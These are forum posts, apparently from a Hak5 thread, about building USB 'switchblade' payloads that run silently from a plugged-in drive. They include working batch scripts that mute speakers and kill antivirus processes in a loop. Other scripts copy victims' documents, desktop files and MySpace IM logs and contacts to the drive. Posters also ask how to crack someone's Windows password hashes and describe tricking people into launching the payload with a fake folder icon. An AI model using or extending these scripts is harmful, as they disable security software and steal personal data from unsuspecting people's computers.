[Evil things]

Are you referring to file attributes and/or switches?

LOL man, nah, That is what we refered to the underground scene back then. HPAV. Hacking/Phreaking/Anarchy/Virii/Cracking(or)Carding

Holy crap, Maybe I am old. :o

[Evil things]

Agreed, I had to write a paper on the difference between a Hacker and a Cracker for my IT major. Below is what I can recall, however I can post the whole paper if anyone wants to see it

Well, hacking is a misnomer. hacking in general is modifying say a piece of hardware to do something it was not designed to do. For example (as stated in another post) flashing the fon and putting it into a pineapple that is hacking. An astronomer the modifies his telescope could be called an astronomy hacker.

At the other end is Cracking. This is when you crack someones WIFI connection or crack a password on a system.

Also, the mainstream media has a lot to do with the abuse of the term hacker probably because of their ignorance. Because let's face it some of the are not credible for example fox broadcast about Mass Effect goes to show you how much research they actually do.

That's it for me before I get into rant mode.

Maybe I am showing my age here, but I have been involved in the underground since before the internet. Does anyone else remember when hacking was still exploration and cracking was just breaking copy protection on software? Does anyone here remember h/p/a/v/c? Ah, the good old days of txt files and three letter affiliations. lol

[USB Pocket-Knife Development]

I'm not familiar with the "old method," sorry. What folder icon??

Also, I have another question, though this one isn't support-related:

How do I get someone's Windows login password? I got a bunch of hashes, and I'm presuming these are what I need...but how do I decrypt them?

And finally, I'd just like to speak up about the method of payload development that's been going on in this thread. It is very, very confusing that multiple people are making multiple updates to Leapo's payload. A GUI, bug fixes, etc. It's impossible for anyone to keep up.

In fact, I personally believe having independent payloads in general is bad. Leapo had the right idea; a payload with just about everything. People have been working with Leapo on this payload to make it a fusion of the best ideas and features, and that's been working, but I understand that he's been inactive for a while and people are taking it upon themselves to edit it and add/edit things to make it better. I know that he hasn't been on in a while, but I feel that things would be simpler and better for everyone if they simply collaborated with Leapo and worked on it with him, so there's only one version of Leapo's payload. Unless he does not plan on updating it any time in the next 2 months, or has quit, then people should just be working with him.

Google John The Ripper, and I respectfully disagree. Such is the nature of community development. It benefits us all. You're just behind the learning curve. You'll catch up...

[USB Pocket-Knife Development]

Well, I'm saying the flaw is that auto-play was disabled by default. Meaning, the person would be immune from attacks without even knowing what auto-play WAS.

Also, what's with that GO.vbs error I kept getting?

Even if auto-run is disabled, simply double clicking the U3 drive from my computer will launch it.

Still can use the old method too, if you're so inclined, and trick people into launching by using the folder icon and dialog for the Open Folder to View Files popup.

[USB Pocket-Knife Development]

Guys, I don't know if anyone else did this, but i solved the no disk error on my all my test machines by simply removing A: and B: from the drive testing part of the script. Your getting that error when it tries to scan a floppy drive for the config file. A: and B: tend to be the floppies on most systems. I have no more issues with it.

[USB Claymore]

No offense man, but it doesn't look any diffrent than most other switchblades. What I did notice is that you made a work around for the firefox password grabber. I didn't test it, but it looks good. Is part of the package missing or am I totally overlooking something?

[Alternative Method to Kill AV's.]

Sorry Jen, I am not familiar with it, I will google eset now.

Also, I was looking at old posts and now realize this isn't exactly a new idea. Can anyone tell me why it was never developed and implemented?

[Alternative Method to Kill AV's.]

Ok guys, We all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife.

What I decided to try, was using Nircmd's processkill command to elminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, We would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill it's process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out with out immediete detection.

I tested this on AVG and it worked flawless and silently.

::Abigwar's First Attempt at Batch AVkiller

::Mute the system volume, in case of audible AV Alerts (Avast!)
nircmd mutesysvolume 1

::Kill AVG Command Center
nircmd killprocess avgcc.exe

::Kill other AVG Processes
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

::Restore system volume at end of switchblade
nircmd mutesysvolume 0

Now what I would like to ask from all of you, is to look at your system processes and lets make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicitable processes. We also need to see how each AV reacts to the attempt to kill it's processes.

One other thing I was considering, that if an AV's process is persistant, we could loop the batch file to continue to run, and kill the process over and over. How that could work, is we would call the seperate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switch blade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

::Theoretical Loop batch

:Start
nircmd killprocess avgcc.exe
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

IF EXIST SWITCHDONE.TXT GOTO END
GOTO START
:END
delete switchdone.txt

[USB Pocket-Knife Development]

Ok! So I tested the Nircmd processkill to kill AVG Antivirus and it worked flawlessly and silently.

I'm going to start a new thread to see if we can develop a list of processes used by AV's.

[USB Pocket-Knife Development]

I was thinking about something...

We all know AVKill never works anymore because every AV catches it right away.

So... Has anyone tried using nircmd's killprocess to shutdown AV's? If it works, we could create a list of AV processes and then use nircmd to try and shut them ALL down, whether they are installed in that machine or not. The downside, I suppose, would be if the virus scanner alerts that it's processes are being killed, however, what is the difference if the AV is alerting it is seeing infected files on the flashdrive anyway. If for stealth purposes you want to make sure the av is still running after the payload we could force a reboot.

Something along the lines of:

nircmd killprocess avg.exe

What do you all think?

[USB Pocket-Knife Development]

Sorry, I take it back, I missed the FOR command.

Ignore my last post. I will test the script in the morning and report back.

[USB Pocket-Knife Development]

I see some issues with your code. Most noteably, other than some scripting that won't work, there is no way to extract the contents of wanted.txt for the batch to know what file extensions are listed in it.

:: By DMilton for free community
:: Thread http://hak5.org/forums/index.php?showtopic=6746

:: Checks the state of Slurp3.cfg
IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3

::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simply to implement too.

:: Detection of ENGLISH OS
IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" (
set MyD=My Documents
set Dsk=Desktop
set ShDsk=Shared Desktop
set ShDoc=Shared Documents
set MSN=My Received Files

echo The Operating System language is ENGLISH>> %log% 2>&1
)

:: Detection of SPANISH OS (After chinese, the second used language in the world);)
IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" (
set MyD=Mis Documentos
set Dsk=Escritorio
set ShDsk=Escritorio Compartido
set ShDoc=Documentos Compartidos
set MSN=Mis Archivos Recibidos

echo The Operating System language is SPANISH>> %log% 2>&1
)

:: Sets other variables and paths to clean up pathnams later on
set SlurpDir=%logdir%\Slurp_Data
set Wanted=%config%\wanted.txt

:: Creates the directory structure for the wanted doc option if not exists
IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\"
IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\"
IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\"
IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\"
IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\"


:: Copying the files with the same structure than original

for /F %%a in (%wanted%) do (

xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C
)

    ECHO 

----------------------------------------------------------------------------------------------------------------------------- 

>> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +    [Wanted files were copied]    + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
pause
:SkipSlurp3

[USB Pocket-Knife Development]

Wow! That is a nicely crafted batch file. Good work!

I added this to the initial :slurp. Pulls contact lists, logs, saved convo's and offline messages for Myspace IM. Have a few other ideas I will implement on my own drive when I get time. Maybe I'll come back and post them.

:: Myspace IM
mkdir %logdir%\Slurp_Data\Myspace
fc.exe "%APPDATA%\Myspace\IM\Conversations\*" "%logdir%\Slurp_Data\Myspace\*" /i /o    
xcopy "%APPDATA%\MySpace\IM\Logs\*.log" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\ContactCache\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\Download\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y